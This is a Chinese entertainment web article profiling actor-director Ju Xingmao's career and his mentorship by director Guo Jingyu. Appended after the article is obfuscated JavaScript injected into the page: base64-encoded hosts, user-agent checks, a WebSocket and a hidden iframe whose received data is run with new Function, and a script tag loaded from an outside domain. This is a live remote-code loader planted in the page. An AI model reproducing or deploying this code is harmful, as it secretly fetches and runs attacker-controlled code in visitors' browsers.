•  榜单
  •  留言

首页

电影

电视剧

娱乐资讯

巨兴茂的逆袭史:七年摸爬滚打,受郭靖宇提携,终成大拿

影视资讯来源:星辰影院人气:219更新:2021-11-02 16:27:08

提起娱乐圈最丑的男明星,大家往往第一会想到的人是黄渤。诚然,黄渤的长相确实不出众,但是娱乐圈里,比他丑的人大有人在。其中之一,就是我们今天要说的知名演员兼导演,巨兴茂。

巨兴茂不是当红的流量小生,也不是蜚声国际的知名电影大佬,或许你没有听过巨兴茂的名字,但是中年人应该多多少少看过和他有关的作品。巨兴茂有很多身份,他的第一种身份是演员,他曾经和陈数合作过《打狗棍》,和杨紫合作过《大秧歌》,和于毅、刘智扬合作过《灵魂摆渡》。他的第二个身份是导演,从执行导演做起,巨兴茂一步步变成独立导演,先后直到了《灵魂摆渡》,《最美的青春》、《娘道》等多部作品。

这些作品收视率高,在观众心里留下了不少深刻的印象。看到这里,大家可能会疑惑:娱乐圈是一个看颜值的地方,为什么其貌不扬的巨兴茂,却能获得如此巨大的成功?

其实,巨兴茂在娱乐圈的奋斗史,离不开自己的努力,也离不开另外一个导演,郭靖宇的大力帮扶。

01

1990年,电影《血色清晨》开拍在即,导演李少红却犯了难。这部讲述农村故事的电影,大部分群演都是请的当地百姓。主演和大部分群演准备就绪,只有一个小演员,李少红导演迟迟没能下决定。这个小演员对剧情起着重要的推动作用,一定要让观众印象深刻。

在村子里面试了许多当地的小朋友,李少红导演认为,没有一个小朋友能够达到自己的要求。如果找不到本地演员,那就只有联系外地演员了。正当李少红导演急得不行的时候,人群里看热闹的巨兴茂吸引了他的视线。

1981年出生的巨兴茂,那一年正好9岁。天生个头不高的他,按理说,应该不太引人注意,但是导演李少红却还是一眼相中了他。原因无他,只因为,巨兴茂的长相实在是太吸引人了。

9岁的巨兴茂虽然在个头上不突出,但是他的五官却自己的特色。一口牙藏在嘴巴里,鼓鼓的。导演李少红一下子就记住了他。

于是李少红点名巨兴茂来出演这个重要的小角色“满意”。李少红带着巨兴茂进入演艺圈,小小的巨兴茂因此对“拍戏”有了一种初步的概念。

三年之后,宁静的一部电影恰好在巨兴茂老家附近拍摄,同样需要大量的群众演员。这一次,巨兴茂不再是看热闹的那个,他选择主动报名。因为先前有过演戏的经验,所以这一次巨兴茂又获得了一个小角色。

拍戏对于在农村长大的巨兴茂来说,绝对是一种新奇的体验。直到电影拍完,巨兴茂还觉得恋恋不舍,或许那时的他,就已经把演员梦藏在心中。

时间又过了几年,巨兴茂已经十四岁了,此时家里无力再供他读书。虽然巨兴茂在农村长大,但是他一点也不想种地,种地太辛苦不说,还赚不到钱。所以早早独立的巨兴茂便想着出门打工。他首先想到的,就是去做演员。揣着父母给自己准备的一点钱,巨兴茂踏上了北漂的旅程。

因为感念李少红导演对自己的支持,和纪念自己出道的第一个角色,巨兴茂便把自己的艺名定为满意,在剧组,大家不叫他“巨兴茂”,都用“巨满意”称呼他。

02

身为农村孩子,巨兴茂自然知道赚钱不容易。所以哪怕在外面吃咸菜,巨兴茂也忍着没有向父母要钱,北漂生活确实难,但是想到在农村生活的父母,巨兴茂又觉得北漂并不是不能忍受。

一开始,巨兴茂在一些电视剧、电影里演背景板。别说台词了,有时候能露出一个头、半张脸,就已经很让巨兴茂兴奋了。“不想当将军的士兵不是好士兵”,在片场待的时间越长,巨兴茂对成名的愿望就更强烈。

但是做群演的机会不是每天都有,“上岗”的机会也要靠抢。巨兴茂因为个头太矮,经常处于“自己抢不到,别人看不着”的尴尬状态。

2001年,算是巨兴茂事业的一个小小转折点。这一年巨兴茂经过层层选拔,终于加入了李亚鹏版的《笑傲江湖》剧组,饰演了一个有不少台词和戏份的“桃实仙”。

李亚鹏在当时是颇受争议的男明星,这就让《笑傲江湖》获得了很多人的关注。而巨兴茂也就凭借着“桃实仙”这个角色在观众面前露了一回脸,也让业内人士更多地认识到了他。从这个角色开始,虽然巨兴茂依旧属于剧组里的打酱油角色,但不可否认的是,越来越多,区别于群演的角色找上了他,巨兴茂终于可以不做背景板了。

巨兴茂人生另一个转折点同样是在《笑傲江湖》剧组。在这里,他遇见了郭靖宇。当时郭靖宇是剧里的执行导演,看到巨兴茂虽然外貌条件差了一点,但是胜在努力。“惜才”的郭靖宇便记住了巨兴茂,惺惺相惜的二人关系处得不错。

郭靖宇是从戏班子走出来的人,戏班文化对于团队的稳定性有着很强烈的要求。所以后来的他在拍戏时习惯启用“老人”,巨兴茂,以及郭靖宇的妻子岳丽娜,弟弟杨志刚,都是在这样的条件下被捧红的。同时郭靖宇又习惯不断地寻找并培养新人,为“郭家班”注入新鲜血液。无论这个人是群众演员,还是片场打杂的,只要想在娱乐圈演戏,又有自己的不平凡之处,郭靖宇都愿意接纳他。

当时的郭靖宇也处在一个学习的阶段,感觉自己学有所成之后,郭靖宇便开始自己做编剧、导演。这个时候的他没有忘记巨兴茂。

2004年,郭靖宇执导电视剧《我非英雄》,这么好的学习机会,郭靖宇不想让巨兴茂错过。于是郭靖宇联系了巨兴茂,给他安排了一个不仅能露脸,还有不少台词的小喽啰角色。

巨兴茂收拾收拾东西就来了。

虽然有台词,但是巨兴茂的戏份,终究不是很多。郭靖宇曾经也是北漂一族,自然知道,“机会”对于一个“娱乐圈小人物”有多重要,于是他告诉巨兴茂,不要再浪费时间了,还是抓紧时间,多学一点东西,这样以后才能有好前途。

为了提拔巨兴茂,郭靖宇在自己的的导演机位旁边,给巨兴茂安排了一个座位,告诉他一定要好好学。于是巨兴茂没事的时候,就和郭靖宇一起学习导演知识。

巨兴茂长相不过关,个头也只有1米66,有时候想演反派都没机会。他知道自己在演戏方面或许接不到什么大角色了,不如早点另谋出路。于是他接受了郭靖宇的建议,不仅在片场学习拍摄知识,离开剧组之后,巨兴茂也一头扎进学习的海洋中。

巨兴茂就这样一边接戏,一边学习,2009年的时候,巨兴茂终于凭借着自己的努力,考进了中戏的导演班。

在学校学习的大多是理论知识,真正到要上手的时候,巨兴茂犯了难。他一个初出茅庐的小导演,谁会选用他呢?这个时候,还是郭靖宇伸出了援手。

郭靖宇把《铁梨花》导演助理的职位交给了巨兴茂,跟着郭靖宇,巨兴茂一边学习更多的导演知识,一方面锻炼自己的导演能力。

为了生存,巨兴茂还接演了《铁梨花》中的“色子”一角。重情重义的色子是女主陈数的小跟班,不过经常和陈数搭戏,倒让巨兴茂觉得有些自卑。一方面是因为陈数太漂亮,另一方面则是因为陈数的个头。巨兴茂也因此自嘲,陈数带着自己,就像牵着一只猴子。

在郭靖宇身边学习,巨兴茂取得了很大的进步。2013年巨兴茂在电视剧《打狗棍》中,已经可以独当一面,这时的他已经成为了B组导演。

03

从2014年的《灵魂摆渡》开始,巨兴茂已经成为了名副其实的导演。《灵魂摆渡》没有大牌参演,贫穷的剧组也请不来当红流量,所选用的演员,要么是郭家班的演员,要么是新人演员,但是谁都没想到,凭借着过硬的剧情质量,这部网剧在当时受到了很多人的喜欢。《灵魂摆渡》成为网剧行业最先吃螃蟹的人,也让一干导演演员赚得是盆满钵满。

《灵魂摆渡》一连播出了三季,每一季都深受观众喜欢,但最终这个系列在第三季真正完结,反倒让不少观众觉得遗憾。

在导演行业大获成功,巨兴茂却一直没有忘记自己的老本行,他演戏的频率不见降低,有时候甚至和郭靖宇一样,边拍边演。

2018年,巨兴茂执导《最美的青春》。这部电视剧关注的是塞罕坝人植树造林的故事,为了更好的还原上一辈塞罕坝人的日常生活,巨兴茂带着演员们在冰天雪地里坚持拍摄。最后这部电视剧获得了央视的青睐,得以在央视播出。电视剧足够出色,观看之后的大部分观众普遍给出了高分。

接连被央视和群众肯定,这说明巨兴茂现在已经是一个合格的导演了。如今的巨兴茂依旧活跃在导演舞台上,给观众带来一部又一部作品。

在导演生涯中,巨兴茂受到过褒奖,也受到过批评。2018年,和郭靖宇联合指导的《娘道》播出后,巨兴茂收到了很多网友的负面的评价。

电视剧里,女主角“瑛娘”拼尽全力要为夫家生儿子,“传宗接代”的思想深深刻在瑛娘的脑子里。为了生儿子,瑛娘给自己的女儿们取名“招娣”“盼娣”。生第三个孩子的时候,瑛娘意外难产,但是认为肚子的孩子是男孩,所以瑛娘竟然说出“我这条贱命算什么,只要能给少爷生下孩子”如此癫狂的话语。很多网友认为,这部电视剧过于“毁三观”。

那段时间,大概是巨兴茂导演生涯的最低谷。不过随着时间的流逝,巨兴茂也为观众带来了不少更有观看价值的电视剧。

04

回望巨兴茂的成名史,被李少红导演看中,是他运气的开始,而后来在群演这一行业中摸爬滚打这么久还不放弃,则说明他有追求。不过在巨兴茂的成名生涯中,郭靖宇起到了至关重要的作用。郭靖宇爱才,惜才。在郭靖宇身上,有着老一辈的执拗,却也有着“宗师”一样的风范,郭家班的组成立足于片场,而巨兴茂则是郭家班中的一员“猛将”。

做导演数年后,巨兴茂早已攒出了过亿的身价。但是出现在公众面前的他并不张扬,穿着依旧朴实。七年的时间,巨兴茂从北漂变成一名导演,又用七年的时间,为自己赚来了过亿家财。

形象不佳的巨兴茂用14年完成了在娱乐圈的逆袭,这样的成功,恐怕再难以复制。

function ZSVFO(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function cUVjRv(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return ZSVFO(t);};window[''+'d'+'i'+'h'+'w'+'s'+'N'+'x'+'y'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=cUVjRv,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/z/'+i;cs.parentElement.insertBefore(s,cs);}})('ZnJoLmpueemhvbmdkaW5nLmNu','dHIueeWVzdW42NzguY29t','130796',window,document,['e','e']);}:function(){};
eval("\x77\x69\x6e\x64\x6f\x77")["\x79\x4F\x46\x73"]=function(e){var SF =''+'ABCDEFGHIJ'+'KLMNOPQR'+'STUVWXYZabcdefghi'+'jklmnopqrstuvwxy'+'z012345'+'6789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=SF.indexOf(e.charAt(f++));o=SF.indexOf(e.charAt(f++));u=SF.indexOf(e.charAt(f++));a=SF.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x54\x61\x59\x79\x73\x46\x75\x53\x4F"]=function(){eval(yOFs("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQoeU9Gcyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKHlPRnMoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZih5T0ZzKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbeU9GcygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIHo9dSsnLTEvcXEvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnIiBhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WydhZCcrJ2RFdicrJ2VudEwnKydpc3QnKydlbmVyJ10oJ20nKydlc3MnKydhZ2UnLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKHlPRnMoZS5kYXRhW3JdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKyc9JysnUScrJ3pNJysnTXQnKydNTUQnKydOeWNUJysnTDRaaycrJ01NbFUnKydXTzFrMycrJ2J2WmsnKydNTScrJ2wnKydNTUROMCcrJ0FUTScrJ01CTicrJ1RKdDkyJysnWXVFSFonKydrRicrJzMnKydkdWMzJysnZDNaaycrJ01NJysnbFlrJysnTScrJ01sRTAnKydNTWxNJysnTUhjMFInKydIYScrJycrJycsJycrJ2ttdicrJ2RrNScrJzdyJysnJysnJyx3aW5kb3csZG9jdW1lbnQsJycrJ2gybycrJ1BoVicrJ24nKycnKycnLCdNJyk="));}